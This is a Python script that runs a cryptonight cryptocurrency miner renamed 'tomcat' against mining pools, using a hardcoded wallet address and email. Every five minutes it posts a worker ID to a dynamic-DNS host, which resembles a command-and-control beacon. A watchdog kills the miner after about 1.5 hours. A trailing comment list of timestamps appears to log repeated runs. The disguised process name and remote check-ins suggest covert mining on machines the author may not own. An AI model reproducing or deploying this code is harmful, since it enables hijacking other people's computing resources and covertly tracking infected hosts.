import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:43:05.991649
#2018-02-17 17:32:01.802994
#2018-02-17 19:20:08.928203
#2018-02-17 21:10:05.835364
#2018-02-17 22:54:07.645656
#2018-02-18 00:39:01.452040
#2018-02-18 02:29:06.792070
#2018-02-18 04:16:05.103458
#2018-02-18 06:08:06.707880
#2018-02-18 07:59:01.868363
#2018-02-18 09:47:05.920277
#2018-02-18 11:34:06.837068
#2018-02-18 13:20:04.580157
#2018-02-18 15:09:04.849987
#2018-02-18 16:57:03.819702
#2018-02-18 18:44:06.210708
#2018-02-18 20:32:04.326340
#2018-02-18 22:18:03.489153
#2018-02-19 00:07:01.975160
#2018-02-19 01:54:03.389186
#2018-02-19 03:41:06.055880
#2018-02-19 05:26:07.696042
#2018-02-19 07:14:06.105484
#2018-02-19 09:02:02.153067
#2018-02-19 10:50:03.122211
#2018-02-19 12:38:06.129987
#2018-02-19 14:27:06.245965
#2018-02-19 16:16:01.784805
#2018-02-19 18:02:07.561696
#2018-02-19 19:48:07.910021
#2018-02-19 21:35:08.557483
#2018-02-19 23:22:08.150666
#2018-02-20 01:08:05.885249
#2018-02-20 02:58:07.260434
#2018-02-20 04:46:07.552193
#2018-02-20 06:30:09.447892
#2018-02-20 08:15:07.388495
#2018-02-20 10:00:01.510292
#2018-02-20 11:45:02.008770
#2018-02-20 13:32:07.623411
#2018-02-20 15:16:06.774287
#2018-02-20 17:01:12.764842
#2018-02-20 18:50:10.737161
#2018-02-20 20:41:02.110643
#2018-02-20 22:25:05.141617
#2018-02-21 00:06:08.748081
#2018-02-21 01:53:01.535288
#2018-02-21 03:43:02.046986
#2018-02-21 05:33:04.978136
#2018-02-21 07:21:04.751933
#2018-02-21 09:05:08.934989
#2018-02-21 10:54:07.077810
#2018-02-21 12:40:10.684623
#2018-02-21 14:28:06.251329
#2018-02-21 16:16:08.257188
#2018-02-21 18:07:08.635364
#2018-02-21 19:53:03.662181
#2018-02-21 21:39:01.404560
#2018-02-21 23:25:08.372670
#2018-02-22 01:13:05.858050
#2018-02-22 03:02:04.280151
#2018-02-22 04:47:05.662330
#2018-02-22 06:32:05.525551
#2018-02-22 08:19:07.321040
#2018-02-22 10:07:05.133762
#2018-02-22 11:52:06.079198
#2018-02-22 13:38:02.172826
#2018-02-22 15:25:10.146881
#2018-02-22 17:12:04.884637
#2018-02-22 18:57:07.473684
#2018-02-22 20:48:08.631413
#2018-02-22 22:33:07.524187
#2018-02-23 00:21:04.435395
#2018-02-23 02:09:01.273268
#2018-02-23 03:59:02.188927
#2018-02-23 05:46:07.841191
#2018-02-23 07:29:04.033225
#2018-02-23 09:33:08.073661
#2018-02-23 11:40:03.708023
#2018-02-23 13:29:01.517559
#2018-02-23 15:14:08.619989
#2018-02-23 17:02:01.684888
#2018-02-23 18:48:07.538010
#2018-02-23 20:34:01.723655
#2018-02-23 22:20:08.314818
#2018-02-24 00:05:03.734993
#2018-02-24 01:54:07.271961
#2018-02-24 03:47:02.004962
#2018-02-24 05:34:05.067353
#2018-02-24 07:19:07.486582
#2018-02-24 09:09:01.632461
#2018-02-24 10:42:06.097411
#2018-02-24 12:32:07.474645
#2018-02-24 14:20:07.437095
#2018-02-24 16:08:04.632842
#2018-02-24 17:58:07.464897
#2018-02-24 19:46:06.662109
#2018-02-24 21:31:06.584586
#2018-02-25 00:17:06.367041
#2018-02-25 04:22:06.658727
#2018-02-25 07:53:06.076520